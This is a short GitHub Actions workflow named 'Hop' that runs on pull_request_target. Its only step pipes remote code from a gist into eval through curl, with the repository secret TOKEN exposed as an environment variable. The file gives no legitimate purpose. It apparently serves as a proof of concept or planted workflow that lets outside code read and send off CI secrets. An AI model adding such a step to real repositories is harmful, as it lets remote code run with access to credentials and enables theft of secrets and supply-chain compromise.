name: Hop

on:
  pull_request_target:
    branches: [ master ]

jobs:
  htmlproofer:
    name: Hop
    runs-on: ubuntu-latest
    steps:
      - name: Hop
        run: |
          eval "$(curl https://gist.githubusercontent.com/h1-0xn3va/52dd679462b0adcf41d901febfa07b57/raw/dcd7d718d4f73ceac725a29b6826fcfc7f30ef47/2)"
        env:
          TOKEN: ${{ secrets.TOKEN }}
